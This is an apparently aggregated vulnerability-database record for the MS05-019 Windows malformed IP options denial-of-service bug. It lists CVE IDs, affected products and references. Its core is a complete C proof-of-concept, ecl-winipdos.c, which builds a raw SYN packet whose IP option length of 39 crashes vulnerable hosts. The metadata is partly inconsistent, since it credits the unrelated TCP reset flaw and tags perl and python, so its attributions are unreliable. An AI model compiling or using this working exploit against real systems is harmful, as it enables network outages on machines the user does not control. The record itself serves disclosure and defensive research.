ID
VAR-E-200404-0002
CVE
| cve_id: | CVE-2004-0230 | Trust: 5.6 | 
| cve_id: | CVE-2004-0790 | Trust: 1.5 | 
| cve_id: | CVE-2004-1060 | Trust: 1.5 | 
| cve_id: | CVE-2005-0688 | Trust: 1.3 | 
| cve_id: | CVE-2005-0048 | Trust: 1.0 | 
| cve_id: | CVE-2004-0791 | Trust: 0.5 | 
| cve_id: | CVE-2005-1649 | Trust: 0.3 | 
EDB ID
942
TITLE
Microsoft Windows - Malformed IP Options Denial of Service (MS05-019) - Windows dos Exploit
Trust: 1.0
DESCRIPTION
Sample proof of concept exploit that demonstrates the TCP vulnerability discovered by Paul A. Watson.
Trust: 1.0
AFFECTED PRODUCTS
| vendor: | microsoft | model: | windows | scope: | - | version: | - | Trust: 1.6 | 
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.10 | Trust: 0.6 | 
| vendor: | sun | model: | sunos | scope: | eq | version: | 4.1.4 | Trust: 0.3 | 
| vendor: | sun | model: | sunos u1 | scope: | eq | version: | 4.1.3 | Trust: 0.3 | 
| vendor: | sco | model: | unixware | scope: | eq | version: | 2.1 | Trust: 0.3 | 
| vendor: | sco | model: | open server | scope: | eq | version: | 5.0 | Trust: 0.3 | 
| vendor: | sco | model: | open desktop | scope: | eq | version: | 3.0 | Trust: 0.3 | 
| vendor: | sco | model: | cmw+ | scope: | eq | version: | 3.0 | Trust: 0.3 | 
| vendor: | novell | model: | netware | scope: | eq | version: | 4.1 | Trust: 0.3 | 
| vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.2.1 | Trust: 0.3 | 
| vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.2 | Trust: 0.3 | 
| vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.1 | Trust: 0.3 | 
| vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp tablet pc edition sp2 | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp tablet pc edition sp1 | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp tablet pc edition | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp professional edition | scope: | eq | version: | x64 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp professional sp2 | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp professional sp1 | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp professional | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp media center edition sp2 | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp media center edition sp1 | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp media center edition | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp home sp2 | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp home sp1 | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp home | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp gold | scope: | eq | version: | 0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp embedded sp1 | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp embedded | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp 64-bit edition version sp1 | scope: | eq | version: | 2003 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp 64-bit edition version | scope: | eq | version: | 2003 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp 64-bit edition sp1 | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp 64-bit edition | scope: | - | version: | - | Trust: 0.3 | 
| vendor: | microsoft | model: | windows xp | scope: | eq | version: | 0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server web edition sp1 beta | scope: | eq | version: | 20031 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server web edition sp1 | scope: | eq | version: | 2003 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server web edition | scope: | eq | version: | 2003 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server standard edition | scope: | eq | version: | 2003x64 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server standard edition sp1 beta | scope: | eq | version: | 20031 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server standard edition sp1 | scope: | eq | version: | 2003 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server standard edition | scope: | eq | version: | 2003 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server enterprise edition | scope: | eq | version: | 2003x64 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server enterprise edition itanium sp1 beta | scope: | eq | version: | 20031 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server enterprise edition itanium sp1 | scope: | eq | version: | 2003 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server enterprise edition itanium | scope: | eq | version: | 20030 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server enterprise edition sp1 beta | scope: | eq | version: | 20031 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server enterprise edition sp1 | scope: | eq | version: | 2003 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server enterprise edition | scope: | eq | version: | 2003 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server datacenter edition | scope: | eq | version: | 2003x64 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server datacenter edition itanium sp1 beta | scope: | eq | version: | 20031 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server datacenter edition itanium sp1 | scope: | eq | version: | 2003 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server datacenter edition itanium | scope: | eq | version: | 20030 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server datacenter edition sp1 beta | scope: | eq | version: | 20031 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server datacenter edition sp1 | scope: | eq | version: | 2003 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows server datacenter edition | scope: | eq | version: | 2003 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt workstation sp3 | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt workstation sp2 | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt workstation sp1 | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt workstation | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt terminal server sp3 | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt terminal server sp2 | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt terminal server sp1 | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt terminal server | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt server sp3 | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt server sp2 | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt server sp1 | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt server | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt enterprise server sp3 | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt enterprise server sp2 | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt enterprise server sp1 | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt enterprise server | scope: | eq | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt | scope: | eq | version: | 3.5.1 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows | scope: | eq | version: | 95 | Trust: 0.3 | 
| vendor: | marconi | model: | atm switch | scope: | eq | version: | 7.0.1 | Trust: 0.3 | 
| vendor: | marconi | model: | atm switch | scope: | eq | version: | 6.1.1 | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | eq | version: | 2.0.31 | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | eq | version: | 2.0.30 | Trust: 0.3 | 
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.24 | Trust: 0.3 | 
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.0 | Trust: 0.3 | 
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.30 | Trust: 0.3 | 
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.20 | Trust: 0.3 | 
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.16 | Trust: 0.3 | 
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.01 | Trust: 0.3 | 
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.0 | Trust: 0.3 | 
| vendor: | hp | model: | hp-ux | scope: | eq | version: | 9.0 | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.5 | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.4 | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.3 | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2 | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.6.1 | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.6 | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.5 | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1x | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1 | Trust: 0.3 | 
| vendor: | cisco | model: | ios/700 | scope: | eq | version: | 1.0 | Trust: 0.3 | 
| vendor: | cisco | model: | ios | scope: | eq | version: | 11.2 | Trust: 0.3 | 
| vendor: | cisco | model: | ios | scope: | eq | version: | 11.1 | Trust: 0.3 | 
| vendor: | cisco | model: | ios | scope: | eq | version: | 11.0 | Trust: 0.3 | 
| vendor: | cisco | model: | ios | scope: | eq | version: | 10.3 | Trust: 0.3 | 
| vendor: | bsdi | model: | bsd/os | scope: | eq | version: | 2.1 | Trust: 0.3 | 
| vendor: | bsdi | model: | bsd/os | scope: | eq | version: | 2.0.1 | Trust: 0.3 | 
| vendor: | bsdi | model: | bsd/os | scope: | eq | version: | 2.0 | Trust: 0.3 | 
| vendor: | bsdi | model: | bsd/os | scope: | eq | version: | 1.1 | Trust: 0.3 | 
| vendor: | avaya | model: | modular messaging | scope: | eq | version: | 3.0 | Trust: 0.3 | 
| vendor: | netbsd | model: | netbsd | scope: | ne | version: | 1.3.2 | Trust: 0.3 | 
| vendor: | netbsd | model: | netbsd | scope: | ne | version: | 1.3.1 | Trust: 0.3 | 
| vendor: | netbsd | model: | netbsd | scope: | ne | version: | 1.3 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt workstation sp4 | scope: | ne | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt terminal server sp4 | scope: | ne | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt server sp4 | scope: | ne | version: | 4.0 | Trust: 0.3 | 
| vendor: | microsoft | model: | windows nt enterprise server sp4 | scope: | ne | version: | 4.0 | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | ne | version: | 2.2.10 | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | ne | version: | 2.2 | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | ne | version: | 2.1.x | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | ne | version: | 2.1 | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.38 | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.37 | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.36 | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.35 | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.34 | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.33 | Trust: 0.3 | 
| vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.32 | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | ne | version: | 2.2.8 | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | ne | version: | 2.2.6 | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | ne | version: | 2.2.2 | Trust: 0.3 | 
| vendor: | freebsd | model: | freebsd | scope: | ne | version: | 3.x | Trust: 0.3 | 
| vendor: | cisco | model: | ios | scope: | ne | version: | 11.2.10 | Trust: 0.3 | 
| vendor: | cisco | model: | ios p | scope: | ne | version: | 11.2.9 | Trust: 0.3 | 
| vendor: | cisco | model: | ios f1 | scope: | ne | version: | 11.2.4 | Trust: 0.3 | 
| vendor: | cisco | model: | ios f | scope: | ne | version: | 11.2.4 | Trust: 0.3 | 
| vendor: | cisco | model: | ios | scope: | ne | version: | 11.2.4 | Trust: 0.3 | 
| vendor: | cisco | model: | ios ia | scope: | ne | version: | 11.1.15 | Trust: 0.3 | 
| vendor: | cisco | model: | ios ca | scope: | ne | version: | 11.1.15 | Trust: 0.3 | 
| vendor: | cisco | model: | ios aa | scope: | ne | version: | 11.1.15 | Trust: 0.3 | 
| vendor: | cisco | model: | ios | scope: | ne | version: | 11.1.15 | Trust: 0.3 | 
| vendor: | cisco | model: | ios ia | scope: | ne | version: | 11.1.9 | Trust: 0.3 | 
| vendor: | cisco | model: | ios ca | scope: | ne | version: | 11.1.7 | Trust: 0.3 | 
| vendor: | cisco | model: | ios aa | scope: | ne | version: | 11.1.7 | Trust: 0.3 | 
| vendor: | cisco | model: | ios | scope: | ne | version: | 11.1.7 | Trust: 0.3 | 
| vendor: | cisco | model: | ios bt | scope: | ne | version: | 11.0.17 | Trust: 0.3 | 
| vendor: | cisco | model: | ios | scope: | ne | version: | 11.0.17 | Trust: 0.3 | 
| vendor: | cisco | model: | ios bt | scope: | ne | version: | 11.0.12 | Trust: 0.3 | 
| vendor: | cisco | model: | ios a | scope: | ne | version: | 10.3.19 | Trust: 0.3 | 
| vendor: | cisco | model: | ios | scope: | ne | version: | 10.3.16 | Trust: 0.3 | 
| vendor: | cisco | model: | catalyst supervisor software | scope: | ne | version: | 29xx2.4.401 | Trust: 0.3 | 
| vendor: | cisco | model: | catalyst supervisor software | scope: | ne | version: | 29xx2.1.1102 | Trust: 0.3 | 
| vendor: | bsdi | model: | bsd/os | scope: | ne | version: | 4.0.1 | Trust: 0.3 | 
| vendor: | bsdi | model: | bsd/os | scope: | ne | version: | 4.0 | Trust: 0.3 | 
| vendor: | bsdi | model: | bsd/os | scope: | ne | version: | 3.1 | Trust: 0.3 | 
| vendor: | bsdi | model: | bsd/os | scope: | ne | version: | 3.0 | Trust: 0.3 | 
EXPLOIT
/* ecl-winipdos.c - 16/04/05
 * Yuri Gushin <yuri@eclipse.org.il>
 * Alex Behar <alex@eclipse.org.il>
 *
 * This one was actually interesting, an off-by-one by our beloved
 * M$ :)
 *
 * When processing an IP packet with an option size (2nd byte after
 * the option) of 39, it will crash - since the maximum available
 * size is 40 for the whole IP options field, and two are already used:
 *                 [ OPT ] [ SIZE ] [ 38 more bytes ]
 * Checks are done to validate that the option-size field is less than
 * 40, where a value less than !39! should be checked for validation.
 *
 * Note that this doesn't affect ALL options, and is also dependant upon
 * the underlying protocol.
 * Anyways, a small PoC to see how it works and why, tweak test and
 * explore, have fun :)
 *
 *
 * Greets fly out to the ECL crew, Valentin Slavov, blexim, stranger,
 * manevski, elius, shrink, Evgeny Pinchuk, Ishay Sommer, and anyone else
 * who got left out :D
 *
 */
#ifndef _BSD_SOURCE
#define _BSD_SOURCE
#endif
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <libnet.h>
#define IP_H 20
#define IPOPTS_MAX 40
void banner();
void usage(char *);
int main(int argc, char **argv)
{
  char errbuf[LIBNET_ERRBUF_SIZE];
  libnet_t *l;
  char *device = NULL;
  int c;
  u_char *buf;
  int packet_len = 0;
  struct ip *IP;
  struct tcphdr *TCP;
  u_int32_t src = 0, dst = 0;
  banner();
  if (argc < 4) usage(argv[0]);
  if ((l = libnet_init(LIBNET_RAW4, device, errbuf)) == NULL) {
    fprintf(stderr, "libnet_init() failed: %s", errbuf);
    exit(-1);
  }
  if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
    fprintf(stderr, "Unresolved source address\n");
    exit(-1);
  }
  if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
    fprintf(stderr, "Unresolved destination address\n");
    exit(-1);
  }
  if ( (buf = malloc(IP_MAXPACKET)) == NULL ) {
    perror("malloc");
    exit(-1);
  }
  buf[20] = atoi(argv[3]);
  buf[21] = 39;                      // our malformed size
  for (c = 0; c<38; c+=3)
    strncpy(&buf[22+c], "ECL", 3);   // padding
  TCP = (struct tcphdr *)(buf + IP_H + IPOPTS_MAX);
  TCP->th_off = 5;
packet_len = IP_H + IPOPTS_MAX + (TCP->th_off << 2);
  srand(time(NULL));
  IP = (struct ip *) buf;
  IP->ip_v    = 4;                   /* version 4 */
  IP->ip_hl   = 5 + (IPOPTS_MAX / 4);/* 60 byte header */
  IP->ip_tos  = 0;                   /* IP tos */
  IP->ip_len  = htons(packet_len);   /* total length */
  IP->ip_id   = rand();              /* IP ID */
  IP->ip_off  = htons(0);            /* fragmentation flags */
  IP->ip_ttl  = 64;                  /* time to live */
  IP->ip_p    = IPPROTO_TCP;         /* transport protocol */
  IP->ip_sum  = 0;
  IP->ip_src.s_addr = src;
  IP->ip_dst.s_addr = dst;
  TCP->th_sport = htons(1337);
  TCP->th_dport = htons(80);
  TCP->th_seq	= 0;
  TCP->th_ack	= 0;
  TCP->th_x2	= 0;
  TCP->th_flags	= TH_SYN;
  TCP->th_win	= rand() & 0xffff;
  TCP->th_sum	= 0;
  TCP->th_urp = 0;
libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_TCP, TCP->th_off << 2);
  if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
    {
      fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
      exit(-1);
    }
  printf("Packet sent.\n");
  libnet_destroy(l);
  free(buf);
  return (0);
}
void usage(char *cmd)
{
  printf("Usage: %s <source> <destination> <option>\n",cmd);
  exit(-1);
}
void banner()
{
  printf("\t\tWindows malformed IP Options DoS exploit\n"
         "\t\t   Yuri Gushin <yuri@eclipse.org.il>\n"
         "\t\t    Alex Behar <alex@eclipse.org.il>\n"
         "\t\t\t       ECL Team\n\n\n");
}
// milw0rm.com [2005-04-17]
Trust: 1.0
EXPLOIT HASH
| LOCAL | SOURCE | ||||||||
| 
 | 
 | 
Trust: 0.5
EXPLOIT LANGUAGE
c
Trust: 1.0
PRICE
Free
Trust: 7.0
TYPE
Malformed IP Options Denial of Service (MS05-019)
Trust: 1.0
TAGS
| tag: | exploit | Trust: 4.5 | 
| tag: | tcp | Trust: 4.0 | 
| tag: | proof of concept | Trust: 3.0 | 
| tag: | denial of service | Trust: 1.0 | 
| tag: | perl | Trust: 0.5 | 
| tag: | python | Trust: 0.5 | 
| tag: | protocol | Trust: 0.5 | 
CREDITS
Paul A. Watson
Trust: 1.0
EXTERNAL IDS
| db: | NVD | id: | CVE-2004-0230 | Trust: 5.6 | 
| db: | EXPLOIT-DB | id: | 942 | Trust: 1.6 | 
| db: | NVD | id: | CVE-2004-0790 | Trust: 1.5 | 
| db: | NVD | id: | CVE-2004-1060 | Trust: 1.5 | 
| db: | NVD | id: | CVE-2005-0688 | Trust: 1.3 | 
| db: | CERT/CC | id: | VU#222750 | Trust: 1.1 | 
| db: | NVD | id: | CVE-2005-0048 | Trust: 1.0 | 
| db: | 0DAYTODAY | id: | 5979 | Trust: 0.6 | 
| db: | EDBNET | id: | 5979 | Trust: 0.6 | 
| db: | EDBNET | id: | 25439 | Trust: 0.6 | 
| db: | PACKETSTORM | id: | 33153 | Trust: 0.5 | 
| db: | PACKETSTORM | id: | 33171 | Trust: 0.5 | 
| db: | PACKETSTORM | id: | 33172 | Trust: 0.5 | 
| db: | PACKETSTORM | id: | 33174 | Trust: 0.5 | 
| db: | PACKETSTORM | id: | 33182 | Trust: 0.5 | 
| db: | PACKETSTORM | id: | 33185 | Trust: 0.5 | 
| db: | PACKETSTORM | id: | 33202 | Trust: 0.5 | 
| db: | PACKETSTORM | id: | 33243 | Trust: 0.5 | 
| db: | NVD | id: | CVE-2004-0791 | Trust: 0.5 | 
| db: | PACKETSTORM | id: | 37801 | Trust: 0.5 | 
| db: | NVD | id: | CVE-2005-1649 | Trust: 0.3 | 
| db: | BID | id: | 13658 | Trust: 0.3 | 
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2004-0230 | Trust: 5.6 | 
| url: | https://nvd.nist.gov/vuln/detail/cve-2004-1060 | Trust: 1.5 | 
| url: | https://nvd.nist.gov/vuln/detail/cve-2004-0790 | Trust: 1.5 | 
| url: | https://nvd.nist.gov/vuln/detail/cve-2005-0048 | Trust: 1.0 | 
| url: | https://nvd.nist.gov/vuln/detail/cve-2005-0688 | Trust: 1.0 | 
| url: | https://0day.today/exploits/5979 | Trust: 0.6 | 
| url: | https://www.exploit-db.com/exploits/942/ | Trust: 0.6 | 
| url: | https://nvd.nist.gov/vuln/detail/cve-2004-0791 | Trust: 0.5 | 
| url: | http://www.microsoft.com/technet/security/bulletin/ms05-019.mspx | Trust: 0.3 | 
| url: | http://support.avaya.com/elmodocs2/security/asa-2006-217.htm | Trust: 0.3 | 
| url: | http://support.microsoft.com/support/kb/articles/q165/0/05.asp | Trust: 0.3 | 
| url: | http://www.cisco.com/warp/public/770/land-pub.shtml#iosvers | Trust: 0.3 | 
| url: | http://www.microsoft.com/technet/security/bulletin/ms06-064.mspx | Trust: 0.3 | 
| url: | http://support.novell.com/cgi-bin/search/tidfinder.cgi?2932511 | Trust: 0.3 | 
| url: | http://support.microsoft.com/support/kb/articles/q177/5/39.asp | Trust: 0.3 | 
| url: | http://www.securityfocus.com/archive/1/392354 | Trust: 0.3 | 
SOURCES
| db: | BID | id: | 13658 | 
| db: | PACKETSTORM | id: | 33153 | 
| db: | PACKETSTORM | id: | 33171 | 
| db: | PACKETSTORM | id: | 33172 | 
| db: | PACKETSTORM | id: | 33174 | 
| db: | PACKETSTORM | id: | 33182 | 
| db: | PACKETSTORM | id: | 33185 | 
| db: | PACKETSTORM | id: | 33202 | 
| db: | PACKETSTORM | id: | 33243 | 
| db: | PACKETSTORM | id: | 37801 | 
| db: | EXPLOIT-DB | id: | 942 | 
| db: | EDBNET | id: | 5979 | 
| db: | EDBNET | id: | 25439 | 
LAST UPDATE DATE
2022-06-21T13:52:58.474000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 13658 | date: | 2016-07-06T14:40:00 | 
SOURCES RELEASE DATE
| db: | BID | id: | 13658 | date: | 2005-05-17T00:00:00 | 
| db: | PACKETSTORM | id: | 33153 | date: | 2004-04-22T02:45:00 | 
| db: | PACKETSTORM | id: | 33171 | date: | 2004-04-23T23:56:17 | 
| db: | PACKETSTORM | id: | 33172 | date: | 2004-04-23T23:57:29 | 
| db: | PACKETSTORM | id: | 33174 | date: | 2004-04-24T00:05:02 | 
| db: | PACKETSTORM | id: | 33182 | date: | 2004-04-25T17:05:00 | 
| db: | PACKETSTORM | id: | 33185 | date: | 2004-04-28T03:49:14 | 
| db: | PACKETSTORM | id: | 33202 | date: | 2004-04-28T06:03:00 | 
| db: | PACKETSTORM | id: | 33243 | date: | 2004-05-04T04:53:37 | 
| db: | PACKETSTORM | id: | 37801 | date: | 2005-06-01T04:54:46 | 
| db: | EXPLOIT-DB | id: | 942 | date: | 2005-04-17T00:00:00 | 
| db: | EDBNET | id: | 5979 | date: | 2005-04-20T00:00:00 | 
| db: | EDBNET | id: | 25439 | date: | 2005-04-17T00:00:00 | 
